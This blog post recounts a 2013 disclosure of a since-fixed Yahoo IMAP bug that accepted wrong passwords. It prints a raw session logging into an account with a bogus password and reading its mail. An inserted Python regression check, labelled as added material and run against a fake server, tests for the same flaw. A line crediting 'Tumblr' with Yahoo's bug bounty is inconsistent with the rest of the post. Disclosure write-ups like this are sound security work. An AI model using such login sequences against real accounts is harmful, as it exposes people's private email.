August 23, 2016

Bug blast from the past: Logging in to anyone's Yahoo! account

Back in May 2013 I found a vulnerability in Yahoo's IMAP endpoints which allowed me to access emails for certain accounts using any old password. Whoops!

I found the bug while I was building an iOS email app at my previous job, and looking at how the app responded to incorrect credentials.

Now that I'm more involved in the infosec scene I thought it'd be cool to look back at my first ever experience of doing responsible disclosure. Long story short: Yahoo ignored me, fixed it, and a couple months later introduced a bug bounty program. If only I'd held out a little longer! 😭

Watch this thrilling exploit!

In the video below I:

  • log in to a test account using an incorrect password
  • access the inbox, and read the first message in the inbox
  • log out
  • using a different incorrect password, log back in to the same account
  • read the first message again
  • log out
  • log in to a different test account, using an incorrect password

Of the three accounts I had permission to test, the first was created in April 2013, the other two a couple of weeks before that. This issue didn't affect my colleague who had a much older Yahoo Mail account. I suspect the date the accounts were created had something to do with it. Interestingly, even if only new accounts were at risk, Marissa Mayer had only recently joined Yahoo. Access to her account would've been bad news!


Nitty gritty detail

Here’s a transcript of the commands I used. Nothing fancy. Just IMAP commands:

$ openssl s_client -host imap.mail.yahoo.com -port 993
CONNECTED(00000003)  
depth=1 /C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance CA-3  
verify error:num=20:unable to get local issuer certificate  
verify return:0  
---
... SSL handshake truncated for brevity ...
    Verify return code: 0 (ok)
---
* OK [CAPABILITY IMAP4rev1 ID NAMESPACE X-ID-ACLID UIDPLUS LITERAL+ CHILDREN XAPPLEPUSHSERVICE XYMHIGHESTMODSEQ AUTH=PLAIN AUTH=LOGIN AUTH=XYMCOOKIE AUTH=XYMECOOKIE AUTH=XYMCOOKIEB64 AUTH=XYMPKI] IMAP4rev1 imapgate-0.7.68_14.357900 imap402.mail.aue.yahoo.com
1 LOGIN "[email protected]" asdf  
1 OK AUTHENTICATE completed - Mailbox size in bytes is 32815  
2 SELECT INBOX  
* 3 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1366345105] UIDs valid
* OK [UIDNEXT 19] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft)] Permanent flags
* OK [HIGHESTMODSEQ 5875762758974036000]
2 OK [READ-WRITE] SELECT completed; now in selected state  
3 UID SEARCH UNSEEN  
* SEARCH 18 
3 OK UID SEARCH completed  
4 UID FETCH 18 (UID FLAGS RFC822.SIZE ENVELOPE BODY.PEEK[HEADER.FIELDS (References)])  
* 3 FETCH (FLAGS (\Answered) UID 18 RFC822.SIZE 5781 ENVELOPE ("Thu, 9 May 2013 11:58:24 +1200" "Yaahooooo" (("Nick Malcolm" NIL "nick" "malcolm.net.nz")) (("Nick Malcolm" NIL "nick" "malcolm.net.nz")) (("Nick Malcolm" NIL "nick" "malcolm.net.nz")) (("Mail Triage" NIL "mailtriageapp" "yahoo.com")) NIL NIL NIL "<[email protected]>") BODY[HEADER.FIELDS (REFERENCES)] {2}

)
4 OK UID FETCH completed  

You can see, after connecting to Yahoo's IMAP server using openssl, that I log in to the account "[email protected]" with the password asdf. The password was not asdf, and it wasn't any of the other incorrect passwords I attempted. I then opened the Inbox, and read the first unread message.
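As an added example (not code from the original post), here is the regression check a mail operator could run against their own IMAP service to confirm that a deliberately wrong password is refused, which is exactly the step the transcript shows going wrong. The `ImapClient`, the `FakeImapServer` stand-in that replays the transcript's "OK AUTHENTICATE completed" behaviour, the `test-user@example.com` account and the bogus password are all constructed for this page; against a live server pass `tls_transport(host)` instead of the fake.

```python
import socket, ssl

class ImapClient:  # minimal tagged-command client over anything with send()/recv()
    def __init__(self, transport):
        self.t, self.buf, self.n = transport, b"", 0
    def readline(self):
        while b"\r\n" not in self.buf:
            chunk = self.t.recv(4096)
            if not chunk:
                raise ConnectionError("server closed the connection")
            self.buf += chunk
        line, _, self.buf = self.buf.partition(b"\r\n")
        return line.decode("utf-8", "replace")
    def command(self, name, *args):
        self.n += 1
        tag = f"A{self.n:03d}"
        self.t.send(" ".join((tag, name) + args).encode() + b"\r\n")
        untagged = []
        while True:  # collect untagged lines until the tagged status arrives
            line = self.readline()
            if line.startswith(tag + " "):
                return line.split(" ", 2)[1], untagged
            untagged.append(line)

def quoted(s):  # IMAP quoted-string: escape backslash and double quote
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'

def wrong_password_accepted(transport, user, bogus="definitely-not-the-password"):
    """Regression check: True if LOGIN with a wrong password is answered OK."""
    c = ImapClient(transport)
    c.readline()  # greeting, e.g. "* OK [CAPABILITY IMAP4rev1 ...]"
    status, _ = c.command("LOGIN", quoted(user), quoted(bogus))
    c.command("LOGOUT")
    return status == "OK"

def tls_transport(host, port=993):  # live server: TLS socket, like openssl s_client
    return ssl.create_default_context().wrap_socket(socket.create_connection((host, port)), server_hostname=host)

class FakeImapServer:  # constructed stand-in so the check runs offline
    def __init__(self, lenient):  # lenient=True mimics the transcript: any password is OK
        self.lenient = lenient
        self.out = b"* OK [CAPABILITY IMAP4rev1 AUTH=PLAIN AUTH=LOGIN] IMAP4rev1 ready\r\n"
    def send(self, data):
        tag, cmd = data.decode().strip().split(" ", 2)[:2]
        reply = {"LOGIN": "OK AUTHENTICATE completed" if self.lenient else "NO [AUTHENTICATIONFAILED] Invalid credentials",
                 "LOGOUT": "OK LOGOUT completed"}.get(cmd, "BAD unknown command")
        self.out += f"{tag} {reply}\r\n".encode()
    def recv(self, n):
        chunk, self.out = self.out[:n], self.out[n:]
        return chunk
```

Run the check with a password that cannot be valid and a test account you own; a `True` result against a production mailbox is the finding this post describes.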

Yahoo's Response

Here's a timeline of Yahoo's response:

  • May 9 - I emailed them, and received an automated response.
  • May 12 - I notice the vulnerability doesn't work anymore.

Pretty disappointing! I was one of many who found their policy of automated responses to be lacking. I went into more detail on their automated responses in my original blog post.

Thankfully in October 2013 Tumblr launched their bug bounty program! It was heartening to see them improve their disclosure policy, because it felt impossible to reach anyone in their security team up until then.

And who knows, if I'd waited I might have been rewarded with a pretty penny: "you will now also be paid for qualifying submissions. These amounts can vary from $250 - $15,000 depending on the severity and complexity of the issue."

Ah well, there's always next time!

ThisData has had a bug bounty since our early, early days, and we love hearing from and working with the security community. We'd love to hear from you too! What bugs have you found recently and how did your disclosure experience go?
